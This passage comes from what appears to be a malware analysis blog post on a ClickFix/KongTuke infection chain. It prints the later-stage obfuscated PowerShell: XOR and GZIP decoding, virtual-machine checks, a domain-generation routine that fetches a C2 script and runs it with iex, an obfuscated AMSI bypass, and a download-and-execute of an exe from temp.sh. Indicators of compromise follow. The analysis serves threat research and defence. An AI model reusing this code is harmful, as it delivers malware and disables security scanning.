$decoded_one = [System.Convert].((-join (@((-1775+(-6567+(84197304/10008))),(1126-1025),(408552/(9450-5928)),(727034/9442),(587719/(9041-(8786-(-1705+(57316065/7885))))),(10353-10237),(1043120/(13363-(9630-(3485+(6594-3782))))),(-6688+(10350-3551)),(397300/3973))| ForEach-Object { [char]$_ })))((-join (@((315770/4511),(1061796/9314),(750249/(11704-4945)),(396869/(6921541/(8195211/4311))),(-1858+(16888872/8778)),(849720/(7479+1281)),(7484-(12217802/(148+(7098510/4701)))),(750228/(1983276/(724905/(3209-(10667-(82635279/(20266885/(2391+(825240/(4496+3439)))))))))),(-6784+(225+6613)),(-2300+2352),(-10080+(23791583/2341)),(-7124+7240),(8607-(15613-(13808-6688))),(7120-7015),(6908-(1407+5391)),(8232-8129))| ForEach-Object { [char]$_ }))).((-join (@((259515/(103+(25137464/(12346-5064)))),(-1521+1631),(941994/(12233-4250)),(-4292+(1495+2908)),(763231/(-2255+(212+(19386-(3579+(3330+3301)))))),(-5159+5260))| ForEach-Object { [char]$_ })))($null, @($encoded_string))
  <#
    decodes to byte array - byte array gets processed further - see decode payload script
  
  #>

$ascii_bytes= $ascii.(([char[]]@((707870/(97775790/9807)),(3336-(1986290/(1573682/2563))),(-305+421),(587598/(87142564/(6944+2844))),(642026/(1165+(35169513/8493))),(7091-6975),(4731-4630),(9752-9637)) -join ''))("xiquayg9wo0c")
  <#
  [System.Text.Encoding]::ascii.GetBytes("xiquayg9wo0c")
  #>
    $decoded_one_clone = $decoded_one
    $bxor_decode = $(
        
        for ($count = 0;$count -lt $decoded_one_clone.((-join (@((1588-1480),(1987-(7657160/(-5703+(9858-95)))),(-9939+10049),(7561-7458),(277936/2396),(1267-(9173744/(14572-6684))))| ForEach-Object { [char]$_ })));) {
            <#
                for $count = 0; $count -lt $decoded_one_clone.length
            #>

            for ($count_2 = 0;$count_2 -lt $ascii_bytes.(([system.String]::new(@((7139-(8535634/1214)),(-8278+8379),(956560/8696),(-3282+(29581515/8739)),(-3262+3378),(315328/(8210656/(19069736/7042)))))));$count_2++) {
                <#
                    another length conversion
                #>
                
                $decoded_one_clone[$count] -bxor $ascii_bytes[$count_2]
                <#
                    basic bxor 
                #>
                $count++
                <#
                    iterate on the top loop
                #>
                if ($count -ge $decoded_one_clone.(([system.String]::new(@((168112/(3731-(6156507/4053))),(8321-(58600380/(30654700/4300))),(360250/3275),(242050/2350),(9588-(10245-(4514320/(52005200/(1757+7148))))),(-543+647)))))) {
                    $count_2 = $ascii_bytes.(([system.String]::new(@((809892/(15424-(15942-8017))),(5619-(28677046/5197)),(362340/3294),(-71+174),(-4316+4432),(9609-9505)))))
                }
            }
        }
    )

        $memory_stream = New-Object ((-join (@((8944-(8912-(-621+(-7869+(1054+(5934+1553)))))),(-7112+7233),(1050870/9138),(1066968/9198),(897284/(6766+(-7672+(6941+2849)))),(5312-(-1469+(48752304/7307))),(8942-(62476608/(16529-9506))),(415735/5695),(3640-3561),(-1601+1647),(1854-(9794824/5512)),(993840/(17106-7266)),(-3721+(13158-9328)),(602397/(-1189+(13744-7128))),(908124/7966),(1071697/(19038-(18201-(5259+2761)))),(294899/(-5398+(3627+5324))),(792744/(-1758+8592)),(3491-3377),(565701/5601),(177801/(15602496/(12410-(36438504/9348)))),(952442/(84077036/(81873598/8509))))| ForEach-Object { [char]$_ })))( , $bxor_decode )

            $System_IO_MemoryStream = New-Object (([system.String]::new(@((-8595+(78188780/(11023-(1202+(9129-8318))))),(824010/6810),(8972-(873+7984)),(487-371),(-8874+(27669925/3083)),(901212/8268),(299276/6506),(4477-4404),(6569-(3630+2860)),(382444/8314),(-7894+7971),(-6485+(1896+4690)),(648877/5953),(467976/(36670768/(85396964/(13719-3901)))),(44460/390),(589-468),(-190+273),(200448/(872+(6639136/7756))),(5686-(-3471+(16990-(2479+5468)))),(303404/3004),(927902/(15661-6095)),(-8353+(81142118/(11798-(-1987+4196))))))))
        $GZIP = New-Object ((-join (@((4826-(15922251/3357)),(109021/901),(2958-2843),(2984-(4343-(-991+2466))),(415009/4109),(-9208+9317),(-796+842),(3217-3144),(-8004+(10689-2606)),(2168-(8650-(15707-(17531890/(1949-39))))),(-7656+(12645-4922)),(4881-(7626-(14160048/(11781-6823)))),(-2626+2735),(10175-(69183125/6875)),(8940-8826),(310-(361361/(-4560+(55236287/8783)))),(-6773+6888),(3006-2891),(647115/6163),(-4651+4762),(-2932+(-6985+10027)),(8991-(6257+2688)),(-8230+(15723-7422)),(54290/445),(8751-8646),(-7603+(10129795/1313)),(710812/(73581888/8592)),(8205-8089),(785346/(12696427/1843)),(-6839+6940),(4664-4567),(-4817+(21364062/4337)))| ForEach-Object { [char]$_ })))($memory_stream, ([IO.Compression.CompressionMode]::Decompress))
        <#
         System.IO.Compression.GzipStream memory_stream decompression 
        #>
        $GZIP.(([system.String]::new(@((208035/3105),(-9809+(8022+1898)),(-3220+3332),(900119/(14275441/(-473+(-444+(-1187+4023))))),(574560/(11935-(9775-(9523800/2035)))),(-5756+5867)))))( $System_IO_MemoryStream )
        <#
            Copy to the System_IO_MemoryStream object 
        #>
        
            $GZIP.((-join (@((640-573),(-6092+6200),(966477/8707),(-8618+8733),(371074/3674))| ForEach-Object { [char]$_ })))()
            <#
                close gzip stream
            #>
            $memory_stream.((-join (@((7401-7334),(789-681),(2203-(9034-6942)),(4798-(3203+1480)),(-6125+(-3708+(16915-(40329237/(10776-(-3755+(12585-3831))))))))| ForEach-Object { [char]$_ })))()
            <#
                close memory stream
            #>
            [byte[]] $decompressed_array = $System_IO_MemoryStream.((-join (@((9596-(89127440/(17950-(14116-(11614-6078))))),(163-(4316/(7370-(11739-4452)))),(-1416+1481),(-9120+(1614+(3413760/(-2611+3059)))),(-6830+(5861+1083)),(-8448+8545),(1099406/(3539+(4209+1338))))| ForEach-Object { [char]$_ })))()
            <#
                Convert cloned GZIP dempress to array
            #>
    $decompressed_array_clone=$decompressed_array
    return $decompressed_array_clone
}

Stage Five

The GZIP’d data results in a script that performs multiple in-depth virtualization checks. I’ve put the code below, with comments for the checks/results. Each switch statement adds a value to an array used for key generation in the final URL ($dnelptozq).

Note: This was really bothering me with how gross it was, so I took out the code for the second and third checks. They look like the first call to Get-MpComputerStatus, just bigger and uglier.

$global:yizxgjtrvb=$executioncontext;$znypogdhsacmq=(Get-MpComputerStatus).($global:yizxgjtrvb.([system.String]::new(@((-6748+(4913601/(1027-(110670/(2511138/(7675-(2816-(3174-(-998+(5318011/(1975946/742))))))))))),(557-447),(4241-(-4799+8922)),(305361/(15790740/5740)),(-5951+(-1220+(9028-(4745-(10821-7826))))),(9517-9416),(3866-3767),(117327/1057),(406679/(-1428+5159)),(-4989+5098),(485-388),(9306-(15466-6270)),(-1258+1358)))).(-join (@((-2832+(10259634/(1616076/462))),(-6012+6132),(-8060+(64607832/7906)),(-6507+(14082-7478)),(-353+(4184131/(9290-253))),(-8684+(17245-8461)),(120290/(3670414/3509)),(1041-(7551-6626)),(-3607+(24387434/(-362+6916))),(523005/(12621-7640)),(248600/(5026-2766)),(981487/(33427732/(-2542+(10876-4826)))))| ForEach-Object { [char]$_ }))([char[]]@( (-5165+(12109-6871)),(-761+(-4895+5771)),(263762/3067),(633150/(60143220/(12223-2249))),(3551-3437),(-6148+6264),(-3561+(22483614/(-3080+(18833-9640)))),(302543/(4262-(10066-(2161+6762)))),(321-213),(-1001+1078),(336493/(-6390+(13812-3953))),(8148-8049),(460616/4429),(600705/(28278903/4943)),(8493-(9665599/1153)),(9309-9208)) -join ''))
# (Get-MpComputerStatus).($ExecutionContext.InvokeCommand.ExpandString('IsVirtualMachine'))
switch($true){
	# IsVirtualMachine
    # checks to see if device is virtual machine
}

# get-wmiobject Win32_VideoController | Select AdapterDACType
switch($true){
    # Win32_VideoController
    # AdapterDACType
    # Looks for VMWare, Bochs, Intel, SeaBIOS, and internal/integrated
}

# Get-WmiObject Win32_CacheMemory | Select purpose
switch($true){
    # Win32_CacheMemory - selects purpose property
    # Looks for L1 cache and the length of the purpose property 
}
 
 $cpizuyxgbjwmh = New-Object (([char[]]@((-9932+10015),(-9080+(74132457/(4822+(8254-(23498958/(7511-(11267-(18235-(17915-(8620-(-5043+5545))))))))))),(4462-(23586822/5426)),(607144/5234),(-95+196),(67253/(1126025/1825)),(-2857+2903),(1378-1296),(2036-1939),(7523-7413),(385500/(-2735+6590)),(9155-9044),(4779-4670)) -join ''))([int](Get-Date).DayOfYear + ((30216909/(6702019/(-2659+3876)))-((16741421892/(-126+(4267374/4922)))/((7155-(2552+3341))+(-4866+10130)))) * ((1478698343+(82136475/10035))/((25489754+7699)/((67059924/7053)-(281820/4620)))));

for ($zifdvumxwayk = ((9687-9687)/((34933204+(6453486/(9387300/(9679-5529))))/(7297888/(8493568/(12525008/2501))))); $zifdvumxwayk -lt ((15118452/(31888212/(-3568+(15838-(45183927/(13374-8085))))))-((-2759+10189)-((32181602+(35744580/5121))/(11232-5563)))); $zifdvumxwayk++) {$dmgnorw += (([system.String]::new(@((8539-8442),(-6211+(6664-(1460470/(9813-(51085836/(2155+(13217-6408))))))),(508167/(8454-(21729303/(-1205+(4695+3053))))),(606700/(12377-6310)),(1016-(6343-5428)),(1022550/(9159+866)),(-1300+1403),(89024/(3486488/4073)),(4819-4714),(3860-(36845510/9815)),(108391/1013),(946188/(963710/110)),(4469/(-6821+(8101-(8720082/7038)))),(613580/(5412+166))))))[$cpizuyxgbjwmh.Next(((20911104/(3267-195))-(3813+2994)), ((634-10145)+(21259800/(7669152/3436))))];}

$xq4c93ti6g2whv0=$dmgnorw + (-join (@((238418/5183),(9348-(424+8808)),(682539/6149),(754992/(11789-(42605120/(4179+(-4233+(7769+725)))))))| ForEach-Object { [char]$_ }));

$ar9cw4fyn65oi1v=-join ((48..57) + (97..122) | Get-Random -Count 10| % {[char]$_});
$bocuhdvkprxezij=-join ((48..57) + (97..122) | Get-Random -Count 5 | % {[char]$_});
$ir9uqjmg4zxwpf2="$($ar9cw4fyn65oi1v)htr$($findom)";
$global:block=(curl -useb "http://$xq4c93ti6g2whv0/$ir9uqjmg4zxwpf2.php?id=$env:computername&key=$dnelptozq&s=63e95be1-92e0-45c1-a928-65d63b17cd1c"); 
 iex $global:block

After checking the properties for virtualization, the script uses the DGA, along with the built array, to generate a URL for retrieving the final payload. I wrote a decoder for this, but you can pretty much build it by following the code logic.

Stage Six

The final stage!

Just an AMSI bypass and an Invoke-WebRequest to pull a binary. Much like Huntress’s write up, this binary was no longer available at the time of analysis. The file host temp.sh only hosts files for three days before deletion.


$Q=$null;$acce="$(('Syst'+'em').NorMaLizE([CHar]([byTe]0x46)+[chAr](46+65)+[CHar]([BYte]0x72)+[cHAR]([bYtE]0x6d)+[CHaR]([bytE]0x44)) -replace [CHAr]([ByTE]0x5c)+[cHaR]([bYtE]0x70)+[ChAR](123)+[chaR](77)+[cHAR](110+19-19)+[chAR]([byTE]0x7d)).$(('Mânãgeme'+'nt').normALiZE([CHar]([bYTe]0x46)+[CHAr](41+70)+[CHaR]([bytE]0x72)+[ChaR]([ByTE]0x6d)+[CHar](68+11-11)) -replace [CHaR]([bytE]0x5c)+[ChAR](112)+[Char](123+74-74)+[cHAr]([Byte]0x4d)+[CHAr](97+13)+[CHAR](125*89/89)).$(('Á'+'u'+'t'+'õ'+'m'+'â'+'t'+'î'+'ô'+'n').NOrmAlIZE([cHaR](70)+[CHAR]([BYTe]0x6f)+[cHar](114+105-105)+[ChAr]([BYtE]0x6d)+[ChaR]([BYte]0x44)) -replace [CHAr](92)+[cHAr](112*93/93)+[CHAr](123)+[char](77)+[cHAr]([byte]0x6e)+[ChaR](125*47/47)).$(('ÀmsìUt'+'îls').noRmAlize([char](70+6-6)+[CHAR]([bYte]0x6f)+[cHar](86+28)+[cHAR](109)+[cHar]([byTE]0x44)) -replace [CHaR]([bYtE]0x5c)+[chAr](112*84/84)+[ChaR](123*9/9)+[cHaR]([BytE]0x4d)+[CHAr](110+101-101)+[chaR](125*35/35))";$piooz="+('ydml'+'ftbg'+'mejg'+'nrrh'+'cpvs'+'vrîx').NOrmalizE([ChAR](70+28-28)+[ChAr]([bYTE]0x6f)+[Char](6+108)+[CHaR]([bYTe]0x6d)+[cHaR](68*41/41)) -replace [Char]([byTE]0x5c)+[ChAR]([BytE]0x70)+[chAr](123)+[chaR](77*12/12)+[ChAR](110+73-73)+[ChAr]([BytE]0x7d)";[Threading.Thread]::Sleep(833);[Ref].Assembly.GetType($acce).GetField($(('ámsíÎ'+'nìtFä'+'îled').NorMalizE([cHAR]([byte]0x46)+[CHaR]([BYTe]0x6f)+[chAr](114*62/62)+[CHar]([bYTE]0x6d)+[chAR](68)) -replace [cHar]([byte]0x5c)+[chAR]([BytE]0x70)+[Char]([bYTE]0x7b)+[cHAR]([Byte]0x4d)+[chAr]([BYTE]0x6e)+[cHAR](125+102-102)),"NonPublic,Static").SetValue($Q,$true);

Invoke-WebRequest "http://temp.sh/utDKu/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe"  -Method POST -OutFile "$env:temp\aa.exe"
start-process "$env:temp\aa.exe"

Final Thoughts

As much as I like puzzles, this was kind of annoying and kind of disappointing. I’d really like to have seen the payload at the end. At least it was more interesting than the SSA phishing stuff I’ve been looking at recently.

Indicators

Indicator Description
hxxps[://]kenco[.]com/ Compromised WordPress Domain
hxxps[://]wilknnson[.]com/6j6s[.]js ClickFix Inject
45[.]61[.]138[.]224 KongTuke C2
hxxp[://]syzv21d[.]top/1[.]php Workgroup Payload
4el0z88umiyauh5[.]top/1[.]php Stage 4
jhbghlmjhfejbaj[.]top/62gmlxw5rehtr[.]php Stage 5
hxxp[://]temp[.]sh/utDKu/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa[.]exe Final payload - unable to retrieve